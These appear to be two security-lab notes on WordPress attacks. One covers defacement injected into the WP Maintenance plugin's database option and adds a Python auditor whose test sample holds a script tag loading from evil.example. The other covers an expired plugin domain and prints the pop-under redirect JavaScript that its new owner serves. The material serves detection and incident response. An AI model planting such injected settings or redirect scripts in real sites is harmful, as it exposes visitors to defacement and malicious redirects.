Attackers leveraging WP Maintenance plugin to deface websites

Recently, during a website investigation, we found that attackers had been modifying the database entries of the WP Maintenance plugin (a very popular WordPress plugin that adds a "down for maintenance" or "coming soon" page to your website) and inserting malicious code into the wpmm_settings option in order to lead visitors to harmful content.

The malware changed the plugin's database values to produce the defacement page, as follows:

The background:

"bg_custom";s:67:"https://www.website.com/wp-content/uploads/2017/07/anonymous.jpg";

And the message:

s:4:"text";
s:538:"<h2 class="pi-item pi-item-spacing pi-title">“When you’re stuck in a foreign country and don’t know the words for “reverse charges”
and you’re in some lonely skin joint in the middle of some poor slum and just had every last cent robbed from you and you call yourself a bodyguard then you know you’re a loser.\"</h2>
<p style="text-align: left"> </p>

Now, in order to "deface" the website, the attacker only needs to enable the maintenance page. No files were rewritten, so inexperienced website owners may have trouble figuring out what happened and how to fix it.

It is worth mentioning that the plugin itself is NOT vulnerable: the attackers were leveraging valid plugin functions instead of replacing the index.php file, as is usually done.
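As an added example (not from the original post and not the plugin's own code), the following Python decodes a raw wpmm_settings value as it is stored in the wp_options table and flags any string that embeds an off-site URL or an active HTML element, which is the kind of change described above. The two serialized samples are constructed, and their design/general nesting is an assumption, not the plugin's real option layout.

```python
import re
from urllib.parse import urlparse

def php_unserialize(data: bytes, pos: int = 0):
    """Minimal PHP unserialize() for the types WordPress options use: N, i, b, d, s, a."""
    t = chr(data[pos])
    if t == "N":
        return None, pos + 2
    if t in "ibd":
        end = data.index(b";", pos)
        raw = data[pos + 2:end]
        val = float(raw) if t == "d" else int(raw)
        return (bool(val) if t == "b" else val), end + 1
    colon = data.index(b":", pos + 2)
    n = int(data[pos + 2:colon])
    if t == "s":  # s:<len>:"...";  <len> is in bytes, so slice before decoding; quotes inside are fine
        start = colon + 2
        return data[start:start + n].decode("utf-8", "replace"), start + n + 2
    if t == "a":  # a:<count>:{key;value;...}
        out, pos = {}, colon + 2
        for _ in range(n):
            key, pos = php_unserialize(data, pos)
            out[key], pos = php_unserialize(data, pos)
        return out, pos + 1
    raise ValueError(f"unsupported type {t!r} at offset {pos}")

ACTIVE_TAG = re.compile(r"<\s*(script|iframe|object|embed|form)\b", re.I)
URL = re.compile(r"https?://[^\s\"'<>]+", re.I)

def audit_value(value, site_host: str, path: str) -> list:
    """Walk the decoded option; flag strings embedding active HTML or URLs to hosts other than the site."""
    if isinstance(value, dict):
        return [f for k, v in value.items() for f in audit_value(v, site_host, f"{path}.{k}")]
    if not isinstance(value, str):
        return []
    findings = [f"{path}: active HTML {m.group(0)!r}" for m in ACTIVE_TAG.finditer(value)]
    for url in URL.findall(value):
        host = urlparse(url).hostname
        if host and host != site_host.lower():
            findings.append(f"{path}: off-site URL {url}")
    return findings

def audit_wpmm_settings(serialized: bytes, site_host: str) -> list:
    """Decode the raw wpmm_settings option value; an empty list means nothing suspicious was found."""
    settings, _ = php_unserialize(serialized)
    return audit_value(settings, site_host, "wpmm_settings")

# Constructed samples (the design/general nesting is assumed, not the plugin's real layout).
TAMPERED_SAMPLE = b'a:2:{s:6:"design";a:1:{s:9:"bg_custom";s:34:"https://evil.example/anonymous.jpg";}s:7:"general";a:1:{s:4:"text";s:49:"<script src="https://evil.example/x.js"></script>";}}'
CLEAN_SAMPLE = b'a:2:{s:6:"design";a:1:{s:9:"bg_custom";s:46:"https://shop.example/wp-content/uploads/bg.jpg";}s:7:"general";a:1:{s:4:"text";s:32:"<h2>We will be back shortly</h2>";}}'
```

The raw value can be pulled with `wp option get wpmm_settings` or straight from the wp_options row; a clean maintenance page that references only your own host and plain markup produces no findings.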

The rendered page looks something like this:

As website owners, we have to make sure our visitors have the best experience possible and are not put at risk when accessing our website.

If you detect any unusual code or suspect any unexpected behavior, we are here to help you get your website back on track.

Yet Another Expired Domain causes WP Plugin to...

Malicious redirects are very common in compromised websites. Attackers try to take advantage of the site resources to promote spam, distribute other malware/backdoors, and perform all kinds of malicious activities.

The type of attack described in this labs note, though, doesn't involve a single website being compromised, but many websites being affected at the same time. Although this is not a new technique, and we've already covered it in a blog post here (https://blog.sucuri.net/2016/08/plugin-expired-domain-security-threat.html), this variant caught our attention because another plugin was being targeted.

During an Incident Response investigation, we found that the malicious redirects were coming from a JavaScript file loaded from the website enmask.com, which is part of a WordPress plugin called "Enmask Captcha": https://wordpress.org/plugins/enmask-captcha-text-based-hosted-captcha-solution/

“This plugin hasn’t been updated in over 2 years. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.”

The plugin author's domain appears to have expired and somebody else purchased it, so anyone using this plugin now experiences redirects on their website, since the new owner of the domain is deliberately redirecting users.

Here are some more details about this plugin and what is causing the redirect:

Code found on the page:

<script type="text/javascript" data-enmask-langcode="en-US" src="hxxp://enmask[.]com//Scripts/Enmask.Captcha.js" data-enmask="true" data-enmask-name="myCaptcha"></script>

Clicking anything on the website leads to this page:

http://findbetterresults[.]com/?dn=enmask.com&pid=9PO755G95

The redirect is caused by the following JavaScript which gets returned when requesting any JavaScript file from the domain; it looks like the new owner of the domain is doing this intentionally:

if (typeof _popwnd == 'undefined') {
    var _popwnd = -1;
    function _popwnd_open() {
        if (_popwnd != -1) return;  // only ever open one window per page load
        _popwnd = window.open('hxxp://findbetterresults.com/?dn=enmask.com&pid=9PO755G95', '_blank', '');
        _popwnd.blur();             // push the new window behind the current one (a "pop-under")
        window.focus();
    }
}
window.addEventListener('click', _popwnd_open);  // fires on the first click anywhere on the page

If you happen to be using this plugin, we highly recommend removing it and/or replacing it with another one that is still supported and provides similar functionality.

Loading images and/or scripts from external websites is not recommended (exceptions may apply, such as large CDNs or services like Facebook or ad networks), for various reasons; here are some:

  • If your website's look and feel, or even its functionality, relies on those external resources, any availability issues they have will impact your website;

  • If the resource you fetch the content from is compromised, your site may be used to distribute unwanted content (even malicious content) without your consent (as we described in this labs note).